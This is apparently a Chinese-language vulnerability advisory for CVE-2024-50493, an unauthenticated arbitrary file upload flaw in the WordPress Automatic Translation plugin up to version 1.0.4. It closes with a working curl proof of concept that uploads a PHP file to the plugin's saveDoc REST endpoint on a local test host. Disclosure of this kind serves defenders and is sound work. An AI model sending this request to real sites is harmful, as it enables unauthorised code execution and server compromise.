
Automatic Translation <= 1.0.4 - 未经认证的任意文件上传
Automatic Translation <= 1.0.4 - 未经身份验证的任意文件上传
WordPress 的 Automatic Translation 插件在 1.0.4 及以下所有版本中存在任意文件上传漏洞,由于缺少文件类型验证。这使得未经身份验证的攻击者能够在受影响站点的服务器上上传任意文件,可能导致远程代码执行。
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"